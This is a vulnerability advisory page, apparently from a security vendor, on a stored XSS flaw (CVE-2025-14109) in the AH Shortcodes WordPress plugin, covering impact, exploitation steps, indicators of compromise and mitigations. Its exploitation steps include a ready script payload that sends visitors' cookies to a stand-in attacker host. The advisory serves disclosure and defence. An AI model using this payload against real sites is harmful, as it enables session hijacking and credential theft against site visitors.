CVE-2025-14109
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-14109 is a Stored Cross-Site Scripting (XSS) vulnerability in the AH Shortcodes plugin for WordPress. It affects all versions up to and including 1.0.2, stemming from insufficient input sanitization and output escaping on the column shortcode attribute. The vulnerability was disclosed on January 7, 2026, with Wordfence as the reporting CNA. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS variant. The vulnerable code resides in includes/shortcodes.php at line 28, where the column shortcode attribute value is rendered without proper sanitization or escaping (WordPress Plugin Trac). An authenticated attacker with at least Contributor-level access can embed a malicious JavaScript payload within the column shortcode attribute in a post or page. Because the payload is stored server-side, it executes in the browser of any user who subsequently visits the affected page, with the scope marked as Changed (cross-boundary impact) (Wordfence).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any visitor's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, defacement of page content, redirection to malicious sites, or delivery of drive-by malware to site visitors. The confidentiality and integrity of user data are both at risk, though availability is not directly impacted (Wordfence).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.029%, indicating a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).

Exploitation steps

  1. Gain Contributor Access: Register or compromise a WordPress account with at least Contributor-level privileges on the target site running AH Shortcodes ≤ 1.0.2.
  2. Create or Edit a Post: Navigate to the WordPress editor and create or edit a post or page where the AH Shortcodes plugin is active.
  3. Inject Malicious Payload: Insert a column shortcode with a crafted attribute containing a JavaScript payload, for example: [column class=""><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  4. Publish the Content: Submit or update the post/page so the malicious shortcode is stored in the database.
  5. Trigger Execution: When any site visitor (including administrators) loads the injected page, the stored script executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or the REST API from Contributor-level accounts containing <script> tags or encoded JavaScript within shortcode parameters.
  • Database: Unexpected <script> tags or JavaScript URIs stored in the wp_posts table within shortcode content, particularly in the column attribute.
  • Network: Outbound requests from visitor browsers to unknown external domains shortly after loading pages containing AH Shortcodes content, potentially indicating cookie exfiltration or redirects.
  • File System: No direct file system artifacts expected, as the payload is stored in the database rather than written to disk.

Mitigation and workarounds

As of the disclosure date, no patched version of the AH Shortcodes plugin was confirmed available — the vulnerability affects all versions through 1.0.2. Site administrators should check the WordPress Plugin Repository for any updated release and upgrade immediately if one is available. As an interim measure, deactivate or remove the AH Shortcodes plugin, restrict Contributor-level account creation to trusted users, and consider using a web application firewall (WAF) such as Wordfence to block XSS payloads (Wordfence).

Community reactions

Wordfence reported this vulnerability as part of their weekly WordPress vulnerability report covering January 5–11, 2026, noting it among a broader set of plugin-level XSS issues (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified for this specific CVE.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78570CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78568CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78572HIGH8.1
  • kalles-addons
NoNoAug 25, 2026
CVE-2026-78576HIGH7.5
  • readabler
NoYesAug 25, 2026
CVE-2026-76128MEDIUM6.4
  • ecommerce-product-catalog
NoYesAug 25, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management